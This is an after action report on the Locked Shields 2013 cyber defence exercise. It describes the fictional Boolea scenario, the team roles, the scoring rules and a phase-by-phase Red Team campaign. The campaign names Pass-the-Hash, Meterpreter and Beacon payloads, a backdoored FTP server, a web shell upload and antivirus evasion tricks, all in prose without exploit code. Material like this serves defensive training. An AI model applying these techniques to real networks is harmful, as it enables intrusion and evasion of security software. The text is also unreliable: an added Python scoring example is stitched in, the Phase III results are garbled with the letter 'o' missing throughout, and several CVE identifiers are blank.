Cyber Defence Exercise Locked Shields After Action Report


Cyber Defence Exercise Locked Shields 2013
After Action Report
Tallinn 2013

1 Executive Summary

This report describes the technical cyber defence exercise (CDX) named Locked Shields 2013 (LS13). The intended target audience of the document consists of: the Blue Teams of LS13, to give them a detailed overview of the events and provide feedback; parties who conduct similar exercises, to share our experiences with the community; and the organisers of the Locked Shields, to identify lessons on how to improve future exercises.

LS13 was a technical CDX executed in April 2013. Ten Blue Teams, consisting of up to 10 experts in IT and 1-2 legal advisors, were the main training audience. They were acting as rapid reaction teams who had to defend virtual networks against the Red Team's attacks, accomplish orders given by headquarters, follow the local news and respond to media inquiries, and analyse the legal aspects of their mission.

The main objective of LS13 was to test the skills of the Blue Team members, educate the legal experts on IT and pressure the lawyers with complex legal tasks.

The scenario engaged the Blue Teams in a mission under UN mandate in a fictional country called Boolea where the conflict between the northern and southern tribes had escalated to a level where the local government was forced to request help from the international community. In addition to traditional hostilities, cyber attacks began in April 2013 against the IT systems of local Aid organisations. Ten Blue Teams were requested to be deployed in order to protect unclassified military networks and Aid organisations' networks.

The Blue Teams were well prepared and were more successful in preventing, detecting and mitigating the attacks than those in previous Locked Shields exercises. In the context of LS13, the following areas were most challenging for the Blue Teams:
- Defending web applications.
- Detecting custom malicious code.
- Mitigating BGP hijacking attacks.
- Initiating efficient information sharing.

A Red Team composed of ad-hoc volunteers is no longer sufficient to provide realistic challenges for the Blue Teams. More permanent, better prepared and better co-operating teams are needed. Better tools are required to provide feedback to the Blue Teams on the offensive campaign.

The technical platform for LS13 was stable and performed well. Building a Gamenet which includes modern technologies (e.g. mobile devices) and scenario-specific components (e.g. military C&C systems) to reflect more closely the complexity of real-world networks remains a challenge.

LS13 was organised in cooperation with the NATO Cooperative Cyber Defence Centre of Excellence, the Estonian Information Systems Authority, Estonian Defence Forces, the Estonian Cyber Defence League, Finnish Defence Forces and many other partners.

2 Contents

1 Executive Summary
2 Contents
3 Overview of Locked Shields
  3.1 Concept
  3.2 Timeline
  3.3 Training Objectives
  3.4 Description of the Teams
    Blue Teams and Legal Advisors
    White Team
    Red Team
    Green Team
    Yellow Team
  3.5 Participants
  3.6 Scenario
    Scenario in a Nutshell
    General Background
    Recent Developments
  3.7 Technical Environment
    Core Infrastructure
    Gamenet
  3.8 Scoring
4 Red Team Campaign
  4.1 Overview
  4.2 Red Team Objectives
  4.3 Toolset
  4.4 Client-Side Team
    Phase I, Phase II, Phase III, Phase IV
    Custom Pre-Planted Code
  4.5 WEB Team
    Phase I, Phase II, Phase III, Phase IV
  Network and Mixed Team
    Phase I, Phase II, Phase III, Phase IV
  Post-Exploitation
  Balance of the Attacks
  Conclusions
Blue Team Defence Campaign
  Introduction
  Preparations
  Common Practices
    Blocking Access and RBL
  Less Common Practices
  Questionable or Forbidden Practices
  Security Software on Windows Systems
  Information Sharing
  Scores
Injects
  Scenario Injects
  Media Injects
  Legal Injects
Legal Play
  Introduction
  Injects
  Team Setup
  Feedback on Execution
  Results
Recommendations to the Blue Teams
  8.1 Protecting Web Applications
  Protecting other Parts of the Infrastructure
  Reporting and Information Sharing
Introduction
Yellow Team Feedback for the Blue Teams
Conclusions
Media Response
Observations and Recommendations to Improve Locked Shields
  Exercise Organisation
  Scenario
  Teams
    White Team
    Red Team
    Green Team
    Legal Team
    Yellow Team
  Communication
    Information Sharing and Collaboration
    Situational Awareness
  Scoring
  Technical Environment
    Core Infrastructure
    Collaboration, SA and Scoring Platform
    Gamenet
  Rules
  Administrative Issues
Acknowledgements
Acronyms

3 Overview of Locked Shields

3.1 Concept

The key characteristics of LS13 were as follows:
- It was a live, technical, Blue/Red Team exercise: Blue Teams had to defend networks against real-time attacks.
- It was international: 18 organisations from 15 nations were engaged in preparing and executing LS13.
- The type of the exercise was a game: the teams did not represent the real organisations they are working for during their daily jobs but were placed into fictional roles. A lab environment was used instead of production networks.
- Over the course of two days the Blue Teams had to defend a pre-built network consisting of roughly 35 virtual machines against the Red Team's attacks. The infrastructure was initially insecure and full of vulnerabilities.
- To provide feedback to the teams and measure the success of different strategies and tactics, Blue Teams were assigned automatic and manual scores.
- Each Blue Team was accompanied by 1 or 2 legal advisors to encourage and facilitate cooperation, communication and understanding between the technical and legal experts.
- Red Team members were not competing with each other. Their objective was to conduct equally balanced attacks on all the Blue Teams' networks.

LS13 was organised by NATO CCD COE in cooperation with Estonian Defence Forces, the Estonian Information Systems' Authority, the Estonian Cyber Defence League, Finnish Defence Forces, and many other partners.

3.2 Timeline

The timeline and main events list for LS13 can be found in the following table.

Date                                Event
22 Nov 2012                         Initial Planning Conference (IPC)
8-9 Jan 2013                        Main Planning Conference (MPC)
15 Mar 2013                         Test Run
26 Mar 2013                         Final Planning Conference (FPC)
04 Apr 2013, 12:00Z (15:00 EEST)    Webinar I: General Information. Strategies and tactics - look into CDX
11 Apr 2013, 12:00Z (15:00 EEST)    Webinar II: General Information. Reporting. Legal play
Apr 2013                            Preparation Days: access for Blue Teams to Gamenet
18 Apr 2013, 12:00Z (15:00 EEST)    Webinar III: General Information. Scoring. VSRoom
Apr 2013                            Execution and Hot Wash-Up

5 Jul 2013                          After Action Report Review

3.3 Training Objectives

The objective was to test the skills of Blue Teams in the following areas:
1. Learning the network. Blue Teams were responsible for securing and maintaining systems previously unknown to them. They had to compile lists of assets and vulnerabilities, assign priorities to the assets, etc.
2. System administration and prevention of attacks. Administrative tasks and hardening configurations were continuous activities. Day 0 vulnerabilities were simulated by not allowing the teams to patch certain systems.
3. Monitoring networks, detecting and responding to attacks. Good monitoring skill was the key capability required to defeat the Red Team.
4. Handling cyber incidents. Prioritisation, reaction time, and clarity of shared information were considered when measuring this aspect.
5. Teamwork: delegation, dividing and assigning roles, leadership. The teams were overloaded with tasks so that better organised and managed teams would be more successful.
6. National and international cooperation. Information sharing. Blue Teams were tasked to set up redundant links between their routing infrastructures to foster cooperation between them. Cooperative teams sharing valuable information were assigned bonus points. Teams refusing to cooperate were assigned a negative score.
7. Reporting. Blue Teams were expected to continuously provide lightweight reports to the White Team. The main aspects measuring their success were timeliness, correctness, accuracy and clarity.
8. Ability to convey the big picture. Blue Teams were expected to compile management reports and respond to media requests.
9. Crisis communication. The Media Simulation Cell evaluated the speed, accuracy, logic and reaction of Blue Teams' spokespeople when responding to media requests.

The legal play was set up so that there was at least one legal advisor in each Blue Team. The training objectives for them were as follows:
1. To have the legal advisors analyse the complex legal issues arising in the context of an armed conflict.
2. To facilitate communication between the legal and technical experts.
3. To educate the legal experts about IT.
4. To an extent, to educate the technical experts about the law.

3.4 Description of the Teams

In this section we describe briefly the teams involved in the LS exercises. More details can be found at Annex I: Detailed Description of the Teams.

Blue Teams and Legal Advisors

Blue Teams (BT) and the legal advisors engaged with them are the main training audience of LS exercises. In LS13, Blue Teams represented military rapid reaction teams whose main task was to secure and protect a pre-built infrastructure against the Red Team's attacks. There were two main network segments: an unclassified network for military units, and the networks running services for Aid organisations deployed in the conflict area. Blue Teams were also expected to:
a. continuously send reports to Headquarters to keep management informed about incidents and other events;
b. respond to media queries;
c. accomplish additional tasks sent from the HQ.

Legal advisors had to brief other members of the Blue Team about their legal status, applicable law, rights and obligations; and answer different questions on legal aspects raised by the HQ. There were also out-of-the-game technical quizzes which the legal advisors were supposed to answer.

White Team

The White Team (WT) had responsibility for preparing the exercise and controlling it during Execution. They defined the training objectives, scenario, and high-level objectives for the Red Team, wrote the rules, prepared media, scenario and legal injects and the communication plan. During Execution, the White Team acted as the exercise controller's cell by deciding when to start different phases, controlling the execution of the Red Team's campaign, and making scoring decisions. Management (HQ), user and media simulation were also part of the White Team's business. There was one person per Blue Team who acted as a liaison officer.

Red Team

The Red Team's (RT) mission was to compromise or degrade the performance of the Blue Team systems. They had altogether 20 pre-defined objectives. They were allowed to repeat some objectives during the next phases. The focus of Locked Shields exercises is to train the Blue Teams; therefore, Red Team members are mainly considered as the work-force to challenge the Blue Teams. In principle, the Red Team uses a white-box approach; technical details of the initial configuration of the Blue Team systems were available for the Red Team beforehand.

Green Team

The Green Team (GT) was responsible for preparing the technical infrastructure. GT had to carry out the following tasks:
- Design, set up and configure the core infrastructure: physical devices, virtualisation platform, storage, networking, remote access, traffic recording, VPN routers for the Blue Teams, user accounts, etc.
- Design and build the Gamenet and Blue Team networks.
- Program the automatic scoring bot and agents.
- Develop solutions for traffic generation.
- Set up solutions for monitoring the general exercise infrastructure.

Yellow Team

The Yellow Team's (YT) role was to provide situational awareness about the game, mainly to the White Team but also to all other participants. The main sources of data for the Yellow Team were lightweight reports provided by the Blue Teams, reports on the status of attack campaigns received from Red Team members, and the results of automatic and manual scoring. The Yellow Team analyst had interfaces to review all the reports and assign them tags based on the content of the report. Regular highlight updates were provided to the White Team leader and to the Blue Teams. The Yellow Team also prepared different views and visualisations of the situation.

3.5 Participants

Blue Teams from the following nations/organisations participated in LS13: DEU, ESP, EST, FIN, ITA, LTU, NATO NCIRC, NLD, POL, SVK.

The White Team, Red Team, Green Team and Yellow Team were staffed with people from the NATO CCD COE, Estonian Defence Forces, the Estonian Information System's Authority, the Estonian Cyber

Defence League, Finnish Defence Forces, the Swedish National Defence College, the NATO Computer Incident Response Capability-Technical Centre, the French Ministry of Defence, the Polish Ministry of National Defence, CERT-LV, Loughborough University, Clarified Security, Clarified Networks, and ByteLife.

3.6 Scenario

This section describes the background scenario used for LS13.

Scenario in a Nutshell

Location: Boolea, a failing state on an island off the coast of Western Africa (think Somalia as an island).
Conflict: southern tribes want to eliminate the northern tribes, government unable to stop the fighting (think Rwanda). A UN-authorised international coalition is in the country with the consent of the Boolean government to stop ethnic cleansing and restore peace (think ISAF). The spring offensive has fixed the coalition military forces in the south. A cholera epidemic has started among the northern tribes (think Haiti). International Aid organisations have few resources in-country, but are mobilising to deal with the epidemic. Aid organisations report cyber attacks against their systems in-country and ask for coalition assistance until crisis response teams fly in (ETA 2 days).
BLUE: coalition military IT teams tasked to provide and secure both coalition unclassified systems and Aid organisations' systems in-country until Aid crisis response teams arrive.
RED: local extremists (expected skill level low to medium); possible intervention from an international terrorist organisation (expected skill level medium to high). The attacker's main goal is to impede the humanitarian relief operation in the north and to bleed coalition resources.

General Background

There is an international coalition operation in Boolea, an island republic located off the western coast of Africa, roughly 800 km north-west-west of Tenerife. While the size of the island is comparable to Ireland, the climate and landscape are more akin to Morocco. The country is poor and the local infrastructure is primitive, especially in terms of sanitation, communications, medical services and education. Internet connectivity with the rest of the world, for example, is unreliable and low-bandwidth. Connectivity within the country is limited to urban centres, which make use of numerous free (and anonymous) wireless networks. The country has no CERT or IT-savvy law enforcement. This forces most international actors to rely either on expensive satellite connectivity or on locally operated systems.

For decades the Boolean government has been challenged for power by a racist extremist movement called Boolea Is Tarnished (BIT). In 2011 BIT proceeded with a ruthless ethnic cleansing campaign against the tribes inhabiting the northern half of the island. In 2012 the international community intervened with a UN-authorised operation to stop the atrocities. While initially successful in securing northern areas, the coalition is still encountering heavy resistance in the south. Although there is no distinct front line, there are daily fire-fights, IED (improvised explosive device) encounters, suicide bombings, kidnappings, etc. Most of the violence is targeted against international humanitarian groups and civilians of the northern tribe. While generally a local affair, there are rumours of weapons shipments and training provided by an international terrorist organisation. According to intelligence analysts, this group is interested in bleeding the resources of the committed states as part of a long-term campaign to weaken the EU and NATO. Such support enables the BIT to openly challenge the military might of the coalition, often making use of unexpectedly complex tactics and technologies.

Recent Developments

It is now 24 April. One week ago the BIT started their spring offensive. So far, they have managed to capture some towns and villages in the southern part of the country. Coalition forces moved to take back the lost ground, but encountered heavy resistance and are now fully engaged in the south.

Three days ago, a cholera epidemic started spreading among the civilian population in the north. The source of the epidemic is probably the water supply system. Some BIT members were captured trying to poison wells, so it may be somehow related to the spring offensive. Due to poor hygiene and inadequate medical infrastructure in the country, the epidemic is expected to spread if left unchecked. The government immediately asked the international community for humanitarian assistance. UN and aid organisations that already operate in the country report that their initial response capability is severely limited. Crisis response teams have been mobilised and are expected to arrive within a couple of days. Coalition forces are still engaged and cannot spare significant manpower to assist with the relief operation.

Aid organisations report that their local IT systems are under cyber attack. This makes it very hard to coordinate the relief effort. Their systems are not built with security in mind and they have no cyber security experts in-country. The Aid organisations ask the coalition to provide 10 IT support teams (code name: Blue) who could assist in keeping the systems running at 10 different sites for 2-3 days until crisis response teams from the Aid organisations arrive. The coalition leadership agrees. However, the Blue Teams must still maintain their own systems, which provide unclassified services (communicating with the local government and Aid organisations, as well as providing welfare services) to coalition units. This means they have to operate systems in two different sites with two different policies. This morning the Blue Teams deploy to assist the Aid organisations.

3.7 Technical Environment

Core Infrastructure

Designing and implementing an environment for a technical cyber battlefield is not a trivial task. The exercise lasts only a few days but during that period the loads are high (more than 400 virtual machines running simultaneously) and the Red Team is actually expected to break the systems.

The LS13 infrastructure was hosted by the Estonian Defence Forces. All components of the Gamenet were virtualised. Participants got access to the environment over the VPN. This time a commercial solution was chosen for several reasons. The main components were Cisco UCS platforms and blade servers, EMC storage devices and the VMware vSphere 5.0 virtualisation platform. A detailed description of the core infrastructure is provided in Annex II: Core Infrastructure.

Gamenet

Each Blue Team had to defend an identical network consisting of 34 virtual machines (VMs):
- Cisco CSR 1000v virtual router.
- Endian Linux firewalls.
- Windows and Linux workstations.
- Domain controllers, file servers.
- DNS and mail servers.
- Linux and Windows servers for hosting web applications and database servers.

In addition, Blue Teams could build 2 VMs themselves and integrate them into their networks. A detailed description of the Gamenet and Blue Team systems can be found at Annex III: Gamenet.

3.8 Scoring

To measure the performance of the Blue Teams and give them feedback, 8 categories for the scores were defined:
1. Availability of provided services. Blue Teams had a list of required services which were constantly checked by the scoring bot. For each service, a weight was defined which corresponded to the score one could get for 100% availability of that service.
2. SLA bonus. If the uptime of a service was within 90% (daily score/8h), bonus points were assigned for that specific service.
3. Successful Red Team attack. Every time the Red Team successfully accomplished an objective, a pre-defined negative score was assigned. Repeating the objective gave half the negative points the second time.
4. Lightweight incident reporting. This was done once per hour.
5. Situation reports (SITREPs) to management. Blue Teams had to compile 2 SITREPs per day, each of which was scored separately.
6. Responding to injects (scenario, media, legal). All injects were separately scored based on pre-defined criteria.
7. VM reverts. Each VM revert cost -100 points.
8. Special scoring.

Bonus points were awarded to Blue Teams for outstanding performance, e.g. for cooperation and information sharing. Positive points were awarded to balance Green Team mistakes. Penalties were imposed for breaking the in-game rules, for instance removing functionality of services after a warning. If the warning was ineffective, the VM was reverted.

The detailed scoring table is not published to avoid Blue Teams pre-calculating winning strategies and focusing on how to defeat the scoring system. The following chart is an approximation of the weight of each category. Note that some categories such as special scoring do not have an upper limit.
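The following is an added example, not the exercise's own scoring bot: it applies the automatic rules of section 3.8 (weighted availability, the 90% SLA bonus, halving of repeated Red Team objectives, -100 per VM revert) to a constructed day of results for one Blue Team. The service weights, probe counts, base penalties and the size of the SLA bonus (10% of the service weight) are assumptions, since the report does not publish its scoring table.

```python
# Added example (not the LS13 scoring bot): applies the scoring rules of
# section 3.8 to a constructed day of results for one Blue Team.
from dataclasses import dataclass
from typing import Dict, List, Tuple

SLA_THRESHOLD = 0.90        # uptime needed for the SLA bonus (from the report)
SLA_BONUS_FRACTION = 0.10   # assumption: bonus worth 10 % of the service weight
REVERT_PENALTY = -100       # points per VM revert (from the report)


@dataclass
class ServiceResult:
    name: str
    weight: int   # points awarded for 100 % availability
    checks: int   # number of scoring-bot probes during the day
    ok: int       # probes that found the service available


def availability_points(svc: ServiceResult) -> Tuple[float, float]:
    """Return (points, uptime) for one service: weight scaled by uptime,
    plus the SLA bonus when uptime reaches the threshold."""
    uptime = svc.ok / svc.checks if svc.checks else 0.0
    points = svc.weight * uptime
    if uptime >= SLA_THRESHOLD:
        points += svc.weight * SLA_BONUS_FRACTION
    return points, uptime


def attack_penalties(successes: List[Tuple[int, int]]):
    """successes: chronological (objective_nr, base_penalty) pairs with a
    negative base_penalty. Each repetition of the same objective costs
    half of the previous one, as the report describes."""
    seen: Dict[int, int] = {}
    detail: List[Tuple[int, int, float]] = []
    total = 0.0
    for nr, base in successes:
        seen[nr] = seen.get(nr, 0) + 1
        penalty = base / (2 ** (seen[nr] - 1))
        detail.append((nr, seen[nr], penalty))
        total += penalty
    return total, detail


def team_score(services, successes, reverts: int, manual_points: float = 0):
    """Combine the automatic categories with points assigned by hand
    (reports, injects, special scoring) into one daily total."""
    availability = sum(availability_points(s)[0] for s in services)
    attacks, _ = attack_penalties(successes)
    revert_points = reverts * REVERT_PENALTY
    return {
        "availability": availability,
        "attacks": attacks,
        "reverts": revert_points,
        "manual": manual_points,
        "total": availability + attacks + revert_points + manual_points,
    }


# Constructed sample day for one Blue Team (weights and probe counts invented).
SAMPLE_SERVICES = [
    ServiceResult("www.aidx.ex HTTP", weight=100, checks=100, ok=95),
    ServiceResult("mail.aidx.ex SMTP", weight=50, checks=100, ok=80),
    ServiceResult("dns.aidx.ex DNS", weight=80, checks=100, ok=100),
]
# Objective 1 succeeded three times, objective 5 once (base penalties invented).
SAMPLE_SUCCESSES = [(1, -200), (5, -150), (1, -200), (1, -200)]

if __name__ == "__main__":
    for nr, rep, pen in attack_penalties(SAMPLE_SUCCESSES)[1]:
        print(f"objective {nr}, success #{rep}: {pen:+.0f}")
    print(team_score(SAMPLE_SERVICES, SAMPLE_SUCCESSES, reverts=2, manual_points=50))
```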

4 Red Team Campaign

4.1 Overview

The offensive operation was divided into 4 phases. The timeframe for each phase was pre-planned, but the White Team had the final right to decide when to move on with the campaign. Altogether 20 specific objectives were defined. The Red Team could repeat the objectives from previous phases but the amount of negative points awarded to the Blue Teams decreased by half with every successful repetition.

After STARTEX was announced and the Gamenet opened there was a 30-minute time window when the Red Team was not allowed to compromise any systems. Generating noise and scanning activities were permitted. At least one Blue Team felt that this time window was not respected by all Red Team members, and that exploitation activities had in fact started earlier.

4.2 Red Team Objectives

The Red Team objectives are provided in the following table (columns: nr, description, zone, intended target, phase, subteam). Where the target cell was empty it is shown as "-".

1. Deface with BIT message and point to malware for distraction. Media Team proposal for first round: img1.jpg; Media Team proposal for second round: img2.jpg. Zone: Aid_DMZ. Target: counting.aidx.ex. Phase: 1. Subteam: WEB.
2. Delete content, destroy the host as much as possible to keep BT busy in Aid_DMZ. I would only steal at this phase and destroy in next. Successful compromise can be proved by providing the hash from /etc/hash. Zone: Aid_DMZ. Target: chat.aidx.ex. Phase: 1. Subteam: WEB.
3. Change bank account numbers for donations. File where the bank account details are written is /var/www/app/templates/donate.tpl. Zone: Aid_DMZ. Target: -. Phase: 1. Subteam: WEB.
4. Compromise and steal volunteer database: database www and table volunteers. It could be stolen directly from db.aidx.ex or through by gaining access to . On the code field each volunteer has the same hash which has to be reported to prove success. Zone: Aid_DMZ. Target: db.aidx.ex. Phase: 1. Subteam: WEB.
5. Gain foothold in AID_INT. Steal C:\Users\Public\Documents\Report1_aid.txt for evidence. Provide the MD5 hash inserted in the end of the file as a proof. Zone: AID_INT. Target: ws2.int.aidx.ex, ws4.int.aidx.ex (optional). Phase: 1. Subteam: CS.
6. Spread inside AID_INT to other hosts and set beacons. Zone: AID_INT. Target: dc.int.aidx.ex (optional), ws*.int.aidx.ex. Phase: 1. Subteam: CS.
7. Compromise AID_INT fileserver. Steal Report5_aid.txt from C:\Documents and Settings\All Users\Documents for evidence. Provide the MD5 hash inserted in the end of the file as a proof. Zone: AID_INT. Target: files.int.aidx.ex. Phase: 1. Subteam: CS.
8. Insert malicious code to MIL public website in order to initiate a water-hole attack and infect MIL_INT and MIL_WEL workstations. Zone: MIL_DMZ. Target: -. Phase: 2. Subteam: WEB.
9. Compromise mail server in MIL_DMZ and steal specific e-mails. Zone: MIL_DMZ. Target: mail.milx.ex. Phase: 2. Subteam: WEB.
10. Compromise mail server in Aid_DMZ and steal specific e-mails. Zone: Aid_DMZ. Target: mail.aidx.ex. Phase: 2. Subteam: WEB.
11. Gain foothold in MIL_INT, stay low, set up beacon. Zone: MIL_INT. Target: ws2.int.milx.ex, ws4.int.milx.ex (optional), ws5.int.milx.ex (optional). Phase: 2. Subteam: CS.
12. Compromise one or more workstations on MIL_WEL. Steal the report from C:\Users\Public\Documents\Report1_mil.txt. Provide the MD5 hash inserted in the end of the file as a proof. Zone: MIL_WEL. Target: ws1.wel.milx.ex (optional), ws2.wel.milx.ex. Phase: 2. Subteam: CS.
13. Insert fake orders in Aid personnel tasking system leading them to ambush. Zone: Aid_DMZ. Target: help.aidx.ex. Phase: 3. Subteam: WEB.
14. Gain and maintain access to the DNS servers. Steal hash from /etc/hash as a proof. Zone: Aid_DMZ. Target: dns.aidx.ex. Phase: 3. Subteam: WEB.
15. Re-gain foothold in MIL_INT through any host. Zone: MIL_INT. Target: ws2.int.milx.ex, ws4.int.milx.ex (optional). Phase: 3. Subteam: CS.
16. Spread inside MIL_INT, set beacons. Zone: MIL_INT. Target: dc.int.milx.ex (optional), ws*.int.milx.ex. Phase: 3. Subteam: CS.
17. Compromise MIL_INT fileserver. Steal report Report5_mil.txt from C:\Documents and Settings\All Users\Documents. Provide the MD5 hash inserted in the end of the file as a proof. Zone: MIL_INT. Target: files.int.milx.ex. Phase: 3. Subteam: CS.
18. Gain access, steal the hash from /etc/hash as proof, maintain access. Zone: MIL_DMZ. Target: dns.milx.ex. Phase: 3. Subteam: WEB.
19. Replace the video feed on TV tower (via MIL_INT, MIL_WEL or directly). By default the following file is streamed and therefore should be replaced: /var/www/stream/1.mp4. Zone: MIL_DMZ. Target: tv.milx.ex. Phase: 4. Subteam: CS.
20. Conduct routing attack against MIL_DMZ. Zone: MIL_DMZ. Target: csr.milx.ex. Phase: 4. Subteam: NET.

4.3 Toolset

For LS exercises, Red Team members were allowed to bring in whatever tools they liked, provided that the licensing conditions were followed. From the collaboration perspective it was important that the toolset was at least to some extent standardised. The following lists the main distributions and the most important software that was used to conduct the attacks:
- Kali and BackTrack5 Linux.
- Cobalt Strike. Raphael Mudge, the developer of the software, sponsored the event and provided the LS13 Red Team an option to test it out during the Execution.
- Metasploit Framework (free open-source version of Metasploit).

4.4 Client-Side Team

The Client-Side (CS) Team was mainly responsible for attacking Windows and Linux workstations using client-side exploits and, after gaining a foothold, trying to compromise the file servers and domain controllers located in internal segments.

Phase I

Objectives

The general objective for the first phase was to focus on targeting the Aid organisations' internal zone (AID_INT). The CS team was expected to fulfil the following tasks:
- O5: Gain foothold in the AID_INT segment (workstations).
- O6: Spread inside AID_INT to other hosts and set beacons (dc.int.aidx.ex, ws*.int.aidx.ex).
- O7: Compromise a file server in AID_INT (files.int.aidx.ex).

Targets

The internal networks on both the MIL side and the Aid side had 2 Windows XP VMs, 2 Windows 7 VMs and 1 Ubuntu Linux VM. Obviously, this means the networks were extremely small compared to real-world situations where large organisations have thousands of computers in a domain. As the legitimate traffic generation system typically did not work, it made defence easier. The Green Team tried to keep the operating systems up to date and remove only specific patches. The same local administrator accounts were created on all Windows machines (one vector to enable Pass-the-Hash). The third-party software was often outdated and contained vulnerabilities. Typical suspects were Java, Adobe Flash and Internet Explorer. The file servers (files.int.aidx.ex, files.int.milx.ex) contained vulnerabilities in both required and non-required applications: FreeFloat FTP Server (OSVDB-88303), Oracle MySQL for Microsoft Windows (CVE ), Sielco Sistemi Winlog (CVE ), Sysax 5.53 SSH (OSVDB-79689). There were also typical issues like administrative user accounts with weak passwords.

Attack Methods

The method of testing the Blue Teams' ability to counter client-side attacks was simple. There was one person in the White Team for each Blue Team (called a blonde) whose task was to simulate the users of the Blue systems. The blondes had to click on links to open malicious web pages, documents or even executable files. As this process was not automatic, the results for different teams could be considered subjective. Naturally, more active blondes could cause more harm. Opening the link triggered an attempt to exploit vulnerabilities in software such as Java (CVE , CVE ), Adobe Flash Player (CVE ), Safari with QuickTime (CVE ), Internet Explorer (CVE ), and MS Office 2010 (CVE ). In some cases Cobalt Strike's autoexploit server was used to automatically select the best exploit. In general, this was not needed as the targeting was easy for Red Team members. They could just request the blondes to open the link or file with specific software. Typical payloads were Cobalt Strike Beacon and Metasploit Meterpreter. The Red Team also acknowledged using DarkComet RAT.

The natural move after gaining user-level access to Windows systems is to escalate privileges and dump the password hashes. Although Pass-The-Hash (PTH) has been a well-known trick for years, mitigating it is not straightforward and it very often still works. PTH was tried by the LS13 Red Team.

The CS team had in their possession custom code pre-planted into a few workstations, which is described in a separate section (Custom Pre-Planted Code).

At the end of the game the Red Team also used insider attacks:
- A VM that was connected into the internal network, simulating a contractor's laptop.
- Malware brought in and executed from a CD drive.

Results

The first Cobalt Strike Beacons called home a few minutes after 08:00Z, the time when the Red Team was allowed to start. The workstations in the AID_INT zone of BT1, BT3, BT7, BT8 and BT10 contacted the beacon servers during the first 20 minutes. Note that, according to Cobalt Strike's activity log, the Red Team had Meterpreter sessions open (these could have been hung sessions) to a workstation in the BT8 network for 4 minutes and in BT7 for 3 hours during the first phase. Still, the first round of the attack was reported as a failure for both.

The AID_INT workstations for all other Blue Teams were not compromised during phase I. It does not necessarily mean that the other teams did something particularly clever. Often it was just not possible to access target systems. The main reasons for this failure were:
a. The workstations were not accessible to the blondes.
b. The respective blonde was gone for a long time.
c. After the first outbound request the target IP was blocked.
d. Vulnerabilities were quickly patched or other countermeasures applied so that the attempts failed.

e. The vulnerability was exploitable but the Red Team was not able to get to the shell. For instance, payloads were blocked by AV.

The objective to compromise a file server in AID_INT failed for all the teams. The presumption for this attack was to have a foothold in the internal network, but this was established in less than half of the Blue Teams. In addition, information on the security issues of the file servers was shared between Blue Teams straight after the start of the game and all exploitation attempts failed. Gaining access using Pass-The-Hash worked quite often, but the Red Team failed to exploit it successfully as their Meterpreter payloads were detected and a shell was not obtained.

Phase II

Objectives

During the second phase, the military networks also became targets. The Red Team was also allowed to repeat the objectives of the previous phase, but a successful repetition gave half the points it did the first time. The new objectives for the CS team were the following:
- O11: Gain foothold in MIL_INT segment, stay low, and set up beacons (workstations).
- O12: Compromise one or more workstations in MIL_WEL.

Results

When the second phase started, all Blue Teams had protected their workstations with security software. Some teams even had two different anti-virus products running. Most of the Red Team members were not prepared to use heavily customised payloads in order to evade IPS and AV. These security solutions do not have any difficulties in detecting malicious executables generated by the Metasploit Framework using the default templates. Therefore in most cases exploitation of vulnerabilities in workstations failed, downloads of executable files were blocked by firewalls or detected by AV/IPS, and a foothold was gained only into the MIL_INT segments of BT1 and BT8. At the end of Day 1 members of the client-side team found a way to kill MS Essentials under user privileges using a tool named Victor. This is one of the reasons why BT1 and BT8 got more attention and were compromised. In the case of one McAfee installation, RT claimed that a self-signed executable with a "McAfee Inc" string inside was sufficient to bypass it.

Phase III

Objectives

The aim of the third phase of the campaign was to achieve global reach, targeting both the Military's and the Aid organisations' networks by repeating previously defined objectives and accomplishing the following new ones:
- O15: Re-gain foothold in MIL_INT through any host (ws*.int.milx.ex).
- O16: Spread inside MIL_INT and set beacons (ws*.int.milx.ex, dc.int.milx.ex).
- O17: Compromise MIL_INT fileserver (files.int.milx.ex).

20 Results Frm the perspective f client-side attacks the situatin was similar t the previus day. Red Team members requested many new IPs fr all their attack servers and started t share links t the blndes. Typically, either the explits failed t run (vulnerabilities patched r detected by AV/IPS) r the IP addresses f the attackers were immediately blcked. Cmprmising the file server in MIL_INT failed fr all teams. In general, there were few exceptins: Windws 8 tablets in the MIL_WEL segment f BT1, BT2 and BT8 were hacked. Fthlds in MIL_INT were successfully regained fr BT1, BT4 and BT9 After lunch, nne f the Red Team members had a live Meterpreter sessin Phase IV Objectives In the final phase f the exercise, Red Team had t hack int the TV twer and replace the riginal vide feed with their wn. In reality tv.milx.ex was just a Linux system streaming a vide ver HTTP using VLC player. There were tw main attack vectrs: Backdred FTP server (vsfptd 2.3.4). Nte that Blue Teams were required t keep the FTP accessible nly frm MIL_WEL and MIL_INT althugh initially it was nt prperly firewalled. Vulnerable vide uplad service. The secnd gal f the CS team fr the final phase was t regain r maintain access t internal netwrks Results Red Team had under their cntrl ne VM inside each Blue Team's MIL_INT segment which was simulating a cntractr's laptp infected with malware. This was saved fr the last phase as the FTP service running n the TV twer cmputer was accessible nly frm internal segments. Unfrtunately fr the Red Team, the cntractr's laptp was cnfigured with similar static IP address (10.x.3.140) fr all Blue Teams. The rgue system was quickly discvered by BT8 and annunced t all the thers. Based n BT8 s bservatin it appears that instead f being quiet, Red Team started t prt scan internal netwrks, which naturally caused immediate detectin. Just befre the TV twer attack a grenade explded near the mbile cntainer where the hardware fr tv.milx.ex was lcated. 
This was an inject, the purpose of which was to justify reverting the VMs. Blue Teams were told that they had only an old backup, so the machines were reverted to the initial vulnerable state and they lost all their changes. Red Team members uploaded the WSO web shell through the vulnerable file upload functionality and were able to change the streaming video for 6 teams. Typically, the compromise was quickly discovered (in less than 5 minutes) and the attackers kicked off the server. The comments for the Blue Teams who prevented this attack:
BT2: tv.mil2.ex/uploads/ directory is not writeable.
BT3: tv.mil3.ex/uploads/ directory is not writeable.

BT5: initial web shell upload succeeded but it was immediately discovered and the attacker's IP blocked. Later comment: team5 have blocked video upload functionality on their website.
BT6: IP got blocked and not able to access the service.
The last attempts to get access to the internal workstations were made at the very end of the exercise. All attempts to deliver the backdoors over the network had failed, and so an ISO image was prepared with custom encoded executables. This image was mounted as a CD device on the workstations and the blondes were requested to open the file on the disk. One Red Team member from FRA was actually very skilled in AV evasion techniques, but he was a new member and the others did not know early enough about his expertise. As a result, the executable was not detected by many AV products and a call-back was received at least from BT1, BT4, BT6 and BT8. The impact may have been limited because BT5 quickly informed the others about "INSIDER THREAT and media full of malware".

Custom Pre-Planted Code
Red Team had developed 2 pieces of code to simulate unknown malware:
1. More noisy and easier to eradicate.
2. Quiet and more difficult to remove.
